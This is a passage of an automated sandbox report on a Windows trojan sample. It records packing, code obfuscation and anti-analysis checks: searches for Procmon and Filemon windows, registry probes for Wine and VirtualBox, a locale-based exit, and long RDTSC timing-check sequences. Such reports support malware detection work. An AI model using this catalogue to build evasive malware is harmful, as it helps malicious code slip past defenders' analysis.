Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481E8F	0_2_00481E8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00091EE8	0_2_00091EE8

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00024610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00039790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00033970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00033970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CV4CISNX.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2146304 > 1048576

Source: file.exe

Static PE information: Raw size of tnleqdlj is bigger than: 0x100000 < 0x1a0e00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00039BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x210957 should be: 0x21529d

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: tnleqdlj
Source: file.exe	Static PE information: section name: afcdkohf
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push edx; mov dword ptr [esp], esi	0_2_004B9064
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push esi; mov dword ptr [esp], esp	0_2_004B9068
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push esi; mov dword ptr [esp], ecx	0_2_004B927E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005680D4 push edi; mov dword ptr [esp], 788E1011h	0_2_00568101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005680D4 push ebx; mov dword ptr [esp], ecx	0_2_00568115
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push eax; mov dword ptr [esp], ebx	0_2_004B010E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push esi; mov dword ptr [esp], ecx	0_2_004B013B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push 433B288Ah; mov dword ptr [esp], ebx	0_2_004B01CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A109D push ebp; mov dword ptr [esp], edx	0_2_004A11AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004A0DC push eax; retf	0_2_0004A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004A0F2 push eax; retf	0_2_0004A119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00496178 push 4FB4AD30h; mov dword ptr [esp], esp	0_2_00499740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040317A push ebx; mov dword ptr [esp], ecx	0_2_004032D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053D11C push 2BB63691h; mov dword ptr [esp], esp	0_2_0053D142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push edi; mov dword ptr [esp], 04BB119Ch	0_2_00476138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 0C83DC39h; mov dword ptr [esp], esi	0_2_00476208
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], eax	0_2_00476275
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 12EFEBDCh; mov dword ptr [esp], ebp	0_2_00476405
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], eax	0_2_00476420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], 7131D4B2h	0_2_00476582
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], esi	0_2_00476596
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 0819E69Ah	0_2_0047659A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push edi; mov dword ptr [esp], ecx	0_2_004765C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 010F8192h	0_2_00476627
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 177F1F12h; mov dword ptr [esp], edx	0_2_004766DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ecx; mov dword ptr [esp], edi	0_2_004766E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push esi; mov dword ptr [esp], eax	0_2_00476741
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], esi	0_2_00476788
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 3E99096Ch; mov dword ptr [esp], eax	0_2_00476920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], edx	0_2_00476924
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 635F0E2Fh; mov dword ptr [esp], edi	0_2_0047693A

Source: file.exe

Static PE information: section name: tnleqdlj entropy: 7.955054294676287

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00039BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4878A9 second address: 4878AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4878AD second address: 4878B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 487B48 second address: 487B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 487E3B second address: 487E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BA8C second address: 48BAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F3D90D93B54h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BAAC second address: 48BAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BB84 second address: 48BB9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F3D90D93B4Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BB9A second address: 48BBA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BBA4 second address: 48BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F3D90D93B46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCEB second address: 47FCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCF0 second address: 47FCFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D90D93B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCFA second address: 47FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F3D90F37F48h 0x00000011 pushad 0x00000012 jmp 00007F3D90F37F23h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9D9A second address: 4A9D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9D9E second address: 4A9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3D90F37F1Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAA99 second address: 4AAA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAA9F second address: 4AAACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D90F37F2Eh 0x00000008 jmp 00007F3D90F37F28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F3D90F37F16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAACA second address: 4AAAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90D93B57h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAC7C second address: 4AAC81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DD4 second address: 4A0DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DD9 second address: 4A0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF1E second address: 4AAF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF24 second address: 4AAF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90F37F16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFE52 second address: 4AFE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3D90D93B46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1355 second address: 4B1359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1359 second address: 4B135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B135F second address: 4B137E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F1Ch 0x00000008 jno 00007F3D90F37F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007F3D90F37F16h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B827C second address: 4B82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3D90D93B48h 0x0000000b jmp 00007F3D90D93B58h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jg 00007F3D90D93B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B82AF second address: 4B82B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7830 second address: 4B784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007F3D90D93B46h 0x0000000c jnl 00007F3D90D93B46h 0x00000012 pop eax 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 jbe 00007F3D90D93B46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79AD second address: 4B79B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79B2 second address: 4B79BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3D90D93B46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79BF second address: 4B79D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79D5 second address: 4B79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79DB second address: 4B79DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7E3B second address: 4B7E58 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F3D90D93B4Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8138 second address: 4B813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BAEF8 second address: 4BAF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3D90D93B56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F058 second address: 46F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCE01 second address: 4BCE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3D90D93B4Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD2CF second address: 4BD2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD2D3 second address: 4BD2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD3A3 second address: 4BD3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD511 second address: 4BD516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDFE0 second address: 4BDFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE0EB second address: 4BE108 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3D90D93B52h 0x00000011 jmp 00007F3D90D93B4Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE5DD second address: 4BE5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BEDC8 second address: 4BEDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BEDCE second address: 4BEDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BFFBF second address: 4BFFC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C08FB second address: 4C0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D26B4h] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 mov edi, dword ptr [ebp+122D394Dh] 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F3D90F37F18h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BD3h], eax 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F3D90F37F16h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1112 second address: 4C1127 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F3D90D93B46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C32 second address: 4C1C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2791 second address: 4C2797 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C3C second address: 4C1C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29EE second address: 4C29F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2797 second address: 4C27BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90F37F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90F37F22h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29F4 second address: 4C29F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C41 second address: 4C1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C27BD second address: 4C27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29F8 second address: 4C2A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 82C8h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 xor esi, 240AB37Ah 0x0000002f mov esi, 429F2E41h 0x00000034 push 00000000h 0x00000036 mov esi, 43852738h 0x0000003b xchg eax, ebx 0x0000003c jg 00007F3D90F37F30h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2A65 second address: 4C2A7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C575A second address: 4C575E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CE5 second address: 4C6CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CE9 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
